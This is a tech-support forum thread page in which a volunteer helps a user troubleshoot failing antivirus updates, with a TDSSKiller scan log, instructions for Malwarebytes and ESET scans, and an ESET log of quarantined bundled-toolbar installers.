21:55:10.0729 0x1f20 [ 3C3C78515F5AB448B022BDF5B8FFDD2E, 35284174A42039C3C1FF8A3C8BC187A5E067C7782FC62D19749C2CB28C4E36C7 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
21:55:10.0760 0x1f20 WANARP - ok
21:55:10.0776 0x1f20 [ 3C3C78515F5AB448B022BDF5B8FFDD2E, 35284174A42039C3C1FF8A3C8BC187A5E067C7782FC62D19749C2CB28C4E36C7 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
21:55:10.0792 0x1f20 Wanarpv6 - ok
21:55:10.0901 0x1f20 [ 691E3285E53DCA558E1A84667F13E15A, 12EDB66EF8FC100402BEA221F354D3BD5542F6DDF715B6E7D873D6BAE7E3D329 ] wbengine        C:\Windows\system32\wbengine.exe
21:55:10.0994 0x1f20 wbengine - ok
21:55:11.0010 0x1f20 [ 9614B5D29DC76AC3C29F6D2D3AA70E67, A2FFB92F0030B4CD771E862DA575ECCF2F3A5B4B85858C1241A0C59262C0EC88 ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
21:55:11.0041 0x1f20 WbioSrvc - ok
21:55:11.0088 0x1f20 [ 34EEE0DFAADB4F691D6D5308A51315DC, A040A03E25A0C78B9E26F86C2DF95BCAF8E7EC90183CEB295615D3265350EBEE ] wcncsvc         C:\Windows\System32\wcncsvc.dll
21:55:11.0166 0x1f20 wcncsvc - ok
21:55:11.0197 0x1f20 [ 5D930B6357A6D2AF4D7653BDABBF352F, 677FF2ED14EE0B0CAA710DA81556CC16D5971DAB10E7C7432D167A87CA6F0EAA ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
21:55:11.0228 0x1f20 WcsPlugInService - ok
21:55:11.0244 0x1f20 [ 1112A9BADACB47B7C0BB0392E3158DFF, 1AE2AFA125973571F91E6945FE8A735F63D76EBB250A0075D98C580167FD9ED4 ] Wd              C:\Windows\system32\DRIVERS\wd.sys
21:55:11.0260 0x1f20 Wd - ok
21:55:11.0306 0x1f20 [ D6EFAF429FD30C5DF613D220E344CCE7, 807D4563E8AD4073688691078EB13AF240E14BA5E0C8506A48B3060A20B90082 ] WDC_SAM         C:\Windows\system32\DRIVERS\wdcsam.sys
21:55:11.0353 0x1f20 WDC_SAM - ok
21:55:11.0400 0x1f20 [ 25944D2CC49E0A6C581D02A74B7D6645, AF8FFAFEC07F1A6A3D4008E609E8E1D705A8DFCC7995C766E3946887203F7BEE ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
21:55:11.0447 0x1f20 Wdf01000 - ok
21:55:11.0462 0x1f20 [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiServiceHost C:\Windows\system32\wdi.dll
21:55:11.0525 0x1f20 WdiServiceHost - ok
21:55:11.0540 0x1f20 [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiSystemHost   C:\Windows\system32\wdi.dll
21:55:11.0572 0x1f20 WdiSystemHost - ok
21:55:11.0618 0x1f20 [ 75E8EBD7040CE238684333F97014762A, 2CA0B267FBAEB303D1F8B639D733DC0DE17BA1276CC9096035B4F2BBBED3EF7F ] WebClient       C:\Windows\System32\webclnt.dll
21:55:11.0681 0x1f20 WebClient - ok
21:55:11.0712 0x1f20 [ 760F0AFE937A77CFF27153206534F275, A53940BA28854486FF18F16B98A3314B36322B0B6EFB54D08B921315BEB0ADD5 ] Wecsvc          C:\Windows\system32\wecsvc.dll
21:55:11.0759 0x1f20 Wecsvc - ok
21:55:11.0774 0x1f20 [ AC804569BB2364FB6017370258A4091B, 1856F354146A5946F3E7D0DD09726FC8A3502B0F0776FEADDF10669C81CC28E2 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
21:55:11.0821 0x1f20 wercplsupport - ok
21:55:11.0852 0x1f20 [ 08E420D873E4FD85241EE2421B02C4A4, E1E9436EB096FF7DE9A76DA6217035257EF9FC7565DDB9016DCA3859E7F1EF0F ] WerSvc          C:\Windows\System32\WerSvc.dll
21:55:11.0884 0x1f20 WerSvc - ok
21:55:11.0899 0x1f20 [ 8B9A943F3B53861F2BFAF6C186168F79, 88E2F79F32AFBA17CB8377A508B83A1EC2315E9F3A365F591C87FE4525AA6713 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
21:55:11.0930 0x1f20 WfpLwf - ok
21:55:11.0962 0x1f20 [ 5CF95B35E59E2A38023836FFF31BE64C, CEA21302B3E855EE592810D4E0DE10E47A47A393064C435463CD54598735CD8D ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
21:55:11.0977 0x1f20 WIMMount - ok
21:55:12.0071 0x1f20 [ 082CF481F659FAE0DE51AD060881EB47, BB67D2AF0BB9192D4CCF66C23D80CE5A1B38715556D94E2561DBF8F805FA30A5 ] WinDefend       C:\Program Files\Windows Defender\mpsvc.dll
21:55:12.0133 0x1f20 WinDefend - ok
21:55:12.0149 0x1f20 WinHttpAutoProxySvc - ok
21:55:12.0196 0x1f20 [ F62E510B6AD4C21EB9FE8668ED251826, FA3E5CAC3E67E49377320CFBE4646585E6B62168292768FEA81E4623F9166890 ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
21:55:12.0274 0x1f20 Winmgmt - ok
21:55:12.0367 0x1f20 [ 1DE9BD23AFA36150586C732D876D9B74, 32CF2C8EC18CFDA677AB72A182EB4B839DCC72BFCD6CA309BE2F434991CAE973 ] WinRM           C:\Windows\system32\WsmSvc.dll
21:55:12.0492 0x1f20 WinRM - ok
21:55:12.0554 0x1f20 [ A67E5F9A400F3BD1BE3D80613B45F708, E170A8BD31A779403DC9C43ED6483DA8E186512D3EE700B87F6BA292E284E367 ] WinUsb          C:\Windows\system32\DRIVERS\WinUsb.sys
21:55:12.0586 0x1f20 WinUsb - ok
21:55:12.0617 0x1f20 [ CCAEC5175F1EBC6EB0DBD607EEA791C1, DE66C80DACC5E7995282811DDC4F72E71C3330CF138B91AD777E36ED4C6C7A5D ] wirelessusbser C:\Windows\system32\DRIVERS\3GDatausbser.sys
21:55:12.0648 0x1f20 wirelessusbser - ok
21:55:12.0710 0x1f20 [ 16935C98FF639D185086A3529B1F2067, E9C6B73A572A04FCE9B1B0E6815F941B10332D9A6D55B92927C2B1275F119091 ] Wlansvc         C:\Windows\System32\wlansvc.dll
21:55:12.0773 0x1f20 Wlansvc - ok
21:55:12.0929 0x1f20 [ 0A70F4022EC2E14C159EFC4F69AA2477, FF248136576F9803762C54DE5439D3411B52DCBC95B93176A5DAB857967D9AC4 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
21:55:12.0976 0x1f20 wlidsvc - ok
21:55:13.0007 0x1f20 [ 0217679B8FCA58714C3BF2726D2CA84E, 4494984B922DCF24D37BCD0E6831CEBD07D1CA49235D04E821D17ED3DF84ED2A ] WmiAcpi         C:\Windows\system32\drivers\wmiacpi.sys
21:55:13.0069 0x1f20 WmiAcpi - ok
21:55:13.0100 0x1f20 [ 6EB6B66517B048D87DC1856DDF1F4C3F, EBB534C4829477C70062ADBB5626236B02FE563A544C53FA255E79F3CA170FE8 ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
21:55:13.0116 0x1f20 wmiApSrv - ok
21:55:13.0241 0x1f20 [ 3B40D3A61AA8C21B88AE57C58AB3122E, 6C67DCB007C3CDF2EB0BBF5FD89C32CD7800C20F7166872F8C387BE262C5CD21 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\wmpnetwk.exe
21:55:13.0319 0x1f20 WMPNetworkSvc - ok
21:55:13.0350 0x1f20 [ A2F0EC770A92F2B3F9DE6D518E11409C, 6838F2148B11285E00DC449D51F8AD85AAE57694E89BA2C607B87AC1C650D845 ] WPCSvc          C:\Windows\System32\wpcsvc.dll
21:55:13.0412 0x1f20 WPCSvc - ok
21:55:13.0444 0x1f20 [ AA53356D60AF47EACC85BC617A4F3F66, 155CB8112AA382D841C1891750FF29EF4F1BF716CD9CDF0F2243209E2CCCAC98 ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
21:55:13.0506 0x1f20 WPDBusEnum - ok
21:55:13.0553 0x1f20 [ A021167A699CF9AB6E5FE2A60C6AFC70, F4B2236DAB6134B3F6755F8C1BB93BE076FDC77793A7F65563D206B22AEA09DA ] WPS             C:\Windows\system32\drivers\wpsdrvnt.sys
21:55:13.0568 0x1f20 WPS - ok
21:55:13.0631 0x1f20 [ C306D2037EC147C7C663994F12B87F1E, D904FFFF3319F4CBF79E8F385F266E7FC4B560260D24E52F60A81358C0AFAB2C ] WpsHelper       C:\Windows\system32\drivers\WpsHelper.sys
21:55:13.0678 0x1f20 WpsHelper - ok
21:55:13.0693 0x1f20 [ 6DB3276587B853BF886B69528FDB048C, 9972FF6DF0DF6F86D1E9BCEF4C29064748B217DA196B0633C30D3D580144951C ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
21:55:13.0756 0x1f20 ws2ifsl - ok
21:55:13.0771 0x1f20 [ 6F5D49EFE0E7164E03AE773A3FE25340, 15B6AFF7455538189A96F8863CC995A271E02C6FBDAC15B037D44DDA65E61339 ] wscsvc          C:\Windows\System32\wscsvc.dll
21:55:13.0787 0x1f20 wscsvc - ok
21:55:13.0787 0x1f20 WSearch - ok
21:55:13.0943 0x1f20 [ D9B0134913E5EF007AF82A418C503322, 7418DD28C8E968674382F8352AAFFC4DE77887E2B71B8844D615F19432B4C55A ] wuauserv        C:\Windows\system32\wuaueng.dll
21:55:14.0021 0x1f20 wuauserv - ok
21:55:14.0068 0x1f20 [ 06E6F32C8D0A3F66D956F57B43A2E070, 9A6BD96A28294B0372F16E13D652FD603308F64B74A56E41E0C68C5E8011F943 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
21:55:14.0114 0x1f20 WudfPf - ok
21:55:14.0130 0x1f20 [ 867C301E8B790040AE9CF6486E8041DF, D867D6498C987944D99508B2FAD6D6B749FA1EDFE8124B0863D4A642352F0855 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
21:55:14.0161 0x1f20 WUDFRd - ok
21:55:14.0192 0x1f20 [ FE47B7BC8EA320C2D9B5E5BF6E303765, 34518DBD1E9EA6E5DA62273B18613761E1D9C6B4E074A93C6D639FBAF02222EA ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
21:55:14.0208 0x1f20 wudfsvc - ok
21:55:14.0255 0x1f20 [ 7CC38741B8F68F1E0D5D79DA6123666A, F90D2DA1C9AFB506C381CD386E1430931B5F81813FEDFD720F87FBC54E7A00DA ] WwanSvc         C:\Windows\System32\wwansvc.dll
21:55:14.0286 0x1f20 WwanSvc - ok
21:55:14.0348 0x1f20 [ B6DF0CFBBB7812CE20D637E749A63C8B, 97A93AE7C1C97F9775C32DD29061C2B73E6F21D55D42C070EF2A0D35E25205E0 ] ZTEusbmdm6k     C:\Windows\system32\DRIVERS\ZTEusbmdm6k.sys
21:55:14.0426 0x1f20 ZTEusbmdm6k - ok
21:55:14.0551 0x1f20 [ B6DF0CFBBB7812CE20D637E749A63C8B, 97A93AE7C1C97F9775C32DD29061C2B73E6F21D55D42C070EF2A0D35E25205E0 ] ZTEusbnmea      C:\Windows\system32\DRIVERS\ZTEusbnmea.sys
21:55:14.0614 0x1f20 ZTEusbnmea - ok
21:55:14.0660 0x1f20 [ B6DF0CFBBB7812CE20D637E749A63C8B, 97A93AE7C1C97F9775C32DD29061C2B73E6F21D55D42C070EF2A0D35E25205E0 ] ZTEusbser6k     C:\Windows\system32\DRIVERS\ZTEusbser6k.sys
21:55:14.0692 0x1f20 ZTEusbser6k - ok
21:55:14.0723 0x1f20 ================ Scan global ===============================
21:55:14.0770 0x1f20 [ DAB748AE0439955ED2FA22357533DDDB, 73EDD402C7479DDCE1998D0C7E99E1EC2974F64EFC33A851439CC85D09EDCDF9 ] C:\Windows\system32\basesrv.dll
21:55:14.0816 0x1f20 [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
21:55:14.0848 0x1f20 [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
21:55:14.0879 0x1f20 [ 364455805E64882844EE9ACB72522830, 906561DBBB33F744844CF27E456226044C85DF0FCFD26DE1FD11E09E2CFA6F8F ] C:\Windows\system32\sxssrv.dll
21:55:14.0926 0x1f20 [ 5F1B6A9C35D3D5CA72D6D6FDEF9747D6, D7BC4ED605B32274B45328FD9914FB0E7B90D869A38F0E6F94FB1BF4E9E2B407 ] C:\Windows\system32\services.exe
21:55:14.0941 0x1f20 [ Global ] - ok
21:55:14.0941 0x1f20 ================ Scan MBR ==================================
21:55:14.0957 0x1f20 [ D71A8B323C50CDA37BE17FC9DC225361 ] \Device\Harddisk0\DR0
21:55:15.0394 0x1f20 \Device\Harddisk0\DR0 - ok
21:55:15.0409 0x1f20 ================ Scan VBR ==================================
21:55:15.0409 0x1f20 [ 05C2135890C22F6454C6A60BCF1FAB9F ] \Device\Harddisk0\DR0\Partition1
21:55:15.0409 0x1f20 \Device\Harddisk0\DR0\Partition1 - ok
21:55:15.0409 0x1f20 [ A95956D26F38239432B2C39D0BED7E1A ] \Device\Harddisk0\DR0\Partition2
21:55:15.0425 0x1f20 \Device\Harddisk0\DR0\Partition2 - ok
21:55:15.0440 0x1f20 [ 1E2722D1C2CA05E0214FE489074EBD1E ] \Device\Harddisk0\DR0\Partition3
21:55:15.0440 0x1f20 \Device\Harddisk0\DR0\Partition3 - ok
21:55:15.0456 0x1f20 [ D3861554F0F1A452F208F9176371AE85 ] \Device\Harddisk0\DR0\Partition4
21:55:15.0456 0x1f20 \Device\Harddisk0\DR0\Partition4 - ok
21:55:15.0456 0x1f20 ================ Scan generic autorun ======================
21:55:15.0503 0x1f20 [ 660E05DD0AA88ECC713FE5B95B540D19, 6E6E87EC8F5A998BCC5AD441FD18D3197716F0208238C0A91F85B6E1CDA8AAB3 ] C:\Program Files\Apoint2K\Apoint.exe
21:55:15.0550 0x1f20 Apoint - ok
21:55:15.0596 0x1f20 [ A2814FED5A47B00BBC99AC58F93B9337, 8B1E6F87DEE200C4D32BAE2D8502205EB7AA9E867EE95136A46E466620B81792 ] C:\Program Files\HP\QuickPlay\QPService.exe
21:55:15.0628 0x1f20 QPService - ok
21:55:15.0706 0x1f20 [ 5C5D40DDDE89190B2B3A19EDAC1CCF55, F758814890FF749E33BD9839B0F3FEFA797E5FA1EB96BC39FAA308B4BEC4CD78 ] C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe
21:55:15.0737 0x1f20 UCam_Menu - ok
21:55:15.0768 0x1f20 [ 0771A5C3B78967F9F83C1C429334AD2A, ACD7C25A85526F8ECC5C54130A1972BC22F78C6E220B99D3D1C2EE42378455FF ] C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe
21:55:15.0784 0x1f20 QlbCtrl.exe - ok
21:55:15.0830 0x1f20 [ 4EFCDF3DB1BBA69C09622991280C4ACB, A86D4694BCFFF3C0FAF07C56A410A8317A953FB581CDCDBED5CAF735A0E2AC0D ] C:\Program Files\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe
21:55:15.0846 0x1f20 UpdatePRCShortCut - ok
21:55:15.0877 0x1f20 [ 5516C26A6AF8EB4E2CAB48EC98A74398, 2BF161DE944090B3B3792AE8F5985FCB09744B3EE626E8253A3861D86284652D ] C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe
21:55:15.0893 0x1f20 HP Software Update - ok
21:55:15.0940 0x1f20 [ DA4ED31DD43ABB0AF99888E236FFDB91, EFB8639A4854A8CB1516639DD032ADFD5AE58082880078115EE1AFB71C9696AF ] C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
21:55:15.0986 0x1f20 WirelessAssistant - ok
21:55:16.0033 0x1f20 [ 0A81E6B7F2E84118C4FC9BC2301465E2, A38DE7FAA3277CA20701C3CCAF62B690E06A309EC418FBEF9F6448FB58BC2488 ] C:\Program Files\CheckPoint\Endpoint Connect\TrGUI.exe
21:55:16.0096 0x1f20 Check Point Endpoint Security - ok
21:55:16.0158 0x1f20 [ 031E0AC7341FBF5699011D71D4157D60, 272F8E40ACDDDCA0E6CE51190693EF0E2C0378B1327CC3647353D85DAFE3FF4E ] C:\Program Files\IDT\WDM\sttray.exe
21:55:16.0220 0x1f20 SysTrayApp - ok
21:55:16.0423 0x1f20 [ C56AEF21A76A6E2BB36A384B2C96389F, A9C8B90631AB4BBFEAABDE3D854283C5073B8786A263B941FF631531F30B7F9A ] C:\Program Files\NVIDIA Corporation\Update Core\NvBackend.exe
21:55:16.0532 0x1f20 NvBackend - ok
21:55:16.0564 0x1f20 [ 51138BEEA3E2C21EC44D0932C71762A8, 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124 ] C:\Windows\system32\rundll32.exe
21:55:16.0579 0x1f20 ShadowPlay - ok
21:55:16.0610 0x1f20 [ 7DA47BA3AA5E202B4B6FF113348BF9B7, A4FBE1C557B00C27957D209AC0752ECFEC13C91CFA25B085F5A5A906E51E0D02 ] C:\Program Files\Reliance 3G\UIExec.exe
21:55:16.0626 0x1f20 UIExec - ok
21:55:16.0860 0x1f20 [ 2B2F4AF9E4EA2BF27C7B29EB66F447AD, 553D5E278BFE7BBE83243487D830F60B31C425A3624E3FA2B0016BFB84879A28 ] C:\Q4SearchInstall\bin\Q4Search.exe
21:55:17.0000 0x1f20 Q4Search Assistance Client - ok
21:55:17.0063 0x1f20 [ FB91F6C664846A128FC050E4DBB21342, 05DCFC76542D7AB8B176A819E551C7EC53E0F549E79327DEB3BB7518E8363B0B ] C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe
21:55:17.0078 0x1f20 MobileBroadband - detected UnsignedFile.Multi.Generic ( 1 )
21:55:21.0509 0x1f20 MobileBroadband ( UnsignedFile.Multi.Generic ) - warning
21:55:21.0509 0x1f20 Force sending object to P2P due to detect: C:\Program Files\Vodafone\Vodafone Mobile Broadband\Bin\MobileBroadband.exe
21:55:28.0295 0x1f20 Object send P2P result: true
21:55:31.0462 0x1f20 [ 0264402F172985D49D324C20B9214F53, 23A8902230E05AD1F02D96D12980E8B926ED16C7AFAA84ACF443DBEB5FAD4C1C ] C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
21:55:31.0493 0x1f20 Ad-Watch - ok
21:55:31.0555 0x1f20 [ 970C730748166E048162F5056F4CFA7D, BE2DE55C9AF13ED4B4B4C4CC396A773C8E5B97266E07F6B970E521D101D70F47 ] C:\Program Files\Common Files\Symantec Shared\ccApp.exe
21:55:31.0571 0x1f20 ccApp - ok
21:55:31.0633 0x1f20 [ DD79A6B15C2F28DE98DF4852AAF6B13B, 0F7E9023E0BA4B40E2DE9A9FA34E85FEAF72B93049AAB3E1D73AD046BB113E05 ] C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe
21:55:31.0649 0x1f20 NCPluginUpdater - ok
21:55:31.0836 0x1f20 [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files\Windows Sidebar\Sidebar.exe
21:55:31.0914 0x1f20 Sidebar - ok
21:55:31.0930 0x1f20 [ BBA1A5B86134F496B926DDAF247DB871, 636990AE49C55189B7EF69C419787440B57EC0BAD98A9C280E1028F741BB222E ] C:\Windows\System32\mctadmin.exe
21:55:31.0961 0x1f20 mctadmin - ok
21:55:32.0008 0x1f20 [ DCCA4B04AF87E52EF9EAA2190E06CBAC, 8858CFD159BB32AE9FCCA1A79EA83C876D481A286E914071D48F42FCA5B343D8 ] C:\Program Files\Windows Sidebar\Sidebar.exe
21:55:32.0054 0x1f20 Sidebar - ok
21:55:32.0054 0x1f20 [ BBA1A5B86134F496B926DDAF247DB871, 636990AE49C55189B7EF69C419787440B57EC0BAD98A9C280E1028F741BB222E ] C:\Windows\System32\mctadmin.exe
21:55:32.0086 0x1f20 mctadmin - ok
21:55:32.0320 0x1f20 [ CCF2234A35077CA217A61C9CACC48198, C1FB60E22DB42073A7803B2715A779D42D86F762D226312E8D3BC78FBB5D1E1D ] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe
21:55:32.0413 0x1f20 LightScribe Control Panel - detected UnsignedFile.Multi.Generic ( 1 )
21:55:40.0432 0x1f20 Detect skipped due to KSN trusted
21:55:40.0432 0x1f20 LightScribe Control Panel - ok
21:55:40.0603 0x1f20 [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] C:\Users\VIJAY\AppData\Local\Google\Update\GoogleUpdate.exe
21:55:40.0634 0x1f20 Google Update - ok
21:55:40.0634 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:41.0648 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:42.0662 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:43.0676 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:44.0690 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:45.0704 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:46.0718 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:47.0732 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:48.0746 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:49.0760 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:50.0774 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:51.0788 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:52.0802 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:53.0816 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:54.0830 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:55.0844 0x1f20 Waiting for KSN requests completion. In queue: 1
21:55:56.0936 0x1f20 AV detected via SS2: Symantec Endpoint Protection, C:\Program Files\Symantec\Symantec Endpoint Protection\WSCSavNotifier.exe ( 11.0.6300.541 ), 0x71010 ( enabled : outofdate )
21:55:56.0936 0x1f20 FW detected via SS2: Symantec Endpoint Protection, C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe ( 11.0.6300.552 ), 0x41010 ( enabled )
21:56:04.0331 0x1f20 ============================================================
21:56:04.0331 0x1f20 Scan finished
21:56:04.0331 0x1f20 ============================================================
21:56:04.0346 0x1fa8 Detected object count: 2
21:56:04.0346 0x1fa8 Actual detected object count: 2

Attached Thumbnails

Edited by vijay.gupta, 14 February 2015 - 10:38 AM.

#14 OCD

SuperHelper

Malware Team
5,574 posts

Posted 14 February 2015 - 02:30 PM

Hi vijay.gupta,

When I ran TDS Killer, 2 threats are found with medium risk. But, it is the exe file for dongle through which Internet is running

Since you know what these 2 items are related to and you intended for it to run on your computer you can skip removing them.

Let's rule out any other malware on your computer.

Malwarebytes' Anti-Malware

Download Malwarebytes' Anti-Malware (save it to your desktop).

- Windows XP : Double click on the icon to run it.
- Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
Select Scan tab.
Select type of scan to perform:
- Threat Scan < --- Select this type of scan
- Custom Scan
- Hyper Scan
Next click the Scan button.
When the scan is complete, if no malicious items are found you can close the program.
If malicious items are found be sure that everything is checked, and click Quarantine .
When completed, a log will open in Notepad. Please save it to a convenient location and post the results.
Note: If you receive a notice that some of the items couldn't be removed, that they have been added to the delete on reboot list, please reboot.

=========================

ESET Online Scanner

*Note:

It is recommended to disable on-board antivirus program and anti-spyware programs while performing scans so there are no conflicts and it will speed up scan time.
Please don't go surfing while your resident protection is disabled!
Once the scan is finished remember to re-enable your antivirus along with your anti-spyware programs.

Tick the box next to YES, I accept the Terms of Use.
Click Start
When asked, allow the activex control to install
Disable your Antivirus software. You can usually do this with its Notification Tray icon near the clock
Click Start
Make sure that the option "Remove found threats" is Checked, and the option "Scan unwanted applications" is Checked.
Click Scan.
Wait for the scan to finish.
When the scan completes, click List of found threats
click Export to Text file and save the file to your desktop using a unique name, such as ESETScan.
Include the contents of this report in your next reply

Note - when ESET doesn't find any threats, no report will be created.
Push the back button.
Push Finish
Re-enable your Antivirus software.

=========================

In your next post please provide the following:

MBAM log
ESET's log.txt

OCD

Proud Graduate of WTT Classroom
Member of UNITE

Threads will be closed if no response after 5 days

If you are satisfied with the help you have received, please consider making a donation.

#15 vijay.gupta

Silver Member

Authentic Member
400 posts

Posted 15 February 2015 - 07:20 AM

Issue still not resolved after performing the below steps.

No threats are found using MalwareByles. So, I guess there will not be any log. Please let me know if there is any. (no log file opened automatically)

Running ESET finds some threats. Maybe because I checked "scan for potentially unsafe applications"

ESET Log:

D:\dumps\ccsetup320.exe   Win32/Bundled.Toolbar.Google.E potentially unsafe application   deleted - quarantined
D:\dumps\OrbitDownloaderSetup.exe   Win32/OpenCandy potentially unsafe application   deleted - quarantined
D:\dumps\rcsetup151.exe   Win32/Bundled.Toolbar.Google.D potentially unsafe application   deleted - quarantined
D:\dumps\SetupImgBurn_2.5.5.0.exe   a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application   deleted - quarantined
D:\dumps\security\rcsetup147.exe   Win32/Bundled.Toolbar.Google.D potentially unsafe application   deleted - quarantined

Also tagged with one or more of these keywords: antivirus, update, smart search

Software → Microsoft Windows™ → Windows Update Started by Jumzanto , 17 Apr 2017 windows, update, kernel	1 reply 5,510 views	PhillPower2 17 Apr 2017
Spyware / Malware / Virus Removal → Virus, Spyware & Malware Removal → I can't install any anti-virus software! [Closed] Started by Bregne , 13 Nov 2015 antivirus, windows 8.1 and 1 more...	3 replies 3,100 views	Satchfan 21 Nov 2015
Spyware / Malware / Virus Removal → Virus, Spyware & Malware Removal → Error 80244019 when updating Windows, Kaspersky etc. Started by MagJordi , 31 Jul 2015 trojan, windows, update, 80244019	0 replies 11,789 views	MagJordi 31 Jul 2015
Spyware / Malware / Virus Removal → Virus, Spyware & Malware Removal → HELP - Avira Scan Stops halfway on a specific dll file and wont finish Started by jayelovecraft , 21 Nov 2014 avira, antivirus, virus, freeze and 1 more...	3 replies 5,521 views	OCD 29 Nov 2014
virus Spyware / Malware / Virus Removal → Virus, Spyware & Malware Removal → Help! computer won´t let me download or install any antivirus [Clo Started by jorgitso , 20 Oct 2014 virus, help, remove, denied and 3 more... 1 2 3	Hot 44 replies 20,516 views	Tomk 12 Nov 2014

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Body Background

skin color theme

Antivirus definitions are not getting updated! [Solved]

#1 vijay.gupta

Attached Files

Advertisements

Register to Remove

#2 OCD

#3 vijay.gupta

#4 vijay.gupta

#5 OCD

#6 vijay.gupta

#7 OCD

#8 vijay.gupta

#9 vijay.gupta

#10 OCD

Advertisements

Register to Remove

#11 vijay.gupta

#12 OCD

#13 vijay.gupta

Attached Thumbnails

#14 OCD

#15 vijay.gupta

Related Topics

Also tagged with one or more of these keywords: antivirus, update, smart search

Windows Update

I can't install any anti-virus software! [Closed]

Error 80244019 when updating Windows, Kaspersky etc.

HELP - Avira Scan Stops halfway on a specific dll file and wont finish

Help! computer won´t let me download or install any antivirus [Clo

0 user(s) are reading this topic

About What the Tech

Follow Us

Body Background

skin color theme

Antivirus definitions are not getting updated! [Solved]

#1 vijay.gupta

Attached Files

Advertisements Register to Remove

#2 OCD

#3 vijay.gupta

#4 vijay.gupta

#5 OCD

#6 vijay.gupta

#7 OCD

#8 vijay.gupta

#9 vijay.gupta

#10 OCD

Advertisements Register to Remove

#11 vijay.gupta

#12 OCD

#13 vijay.gupta

Attached Thumbnails

#14 OCD

#15 vijay.gupta

Related Topics

Also tagged with one or more of these keywords: antivirus, update, smart search

Windows Update

I can't install any anti-virus software! [Closed]

Error 80244019 when updating Windows, Kaspersky etc.

HELP - Avira Scan Stops halfway on a specific dll file and wont finish

Help! computer won´t let me download or install any antivirus [Clo

0 user(s) are reading this topic

About What the Tech

Follow Us

Sign In

Advertisements

Register to Remove

Advertisements

Register to Remove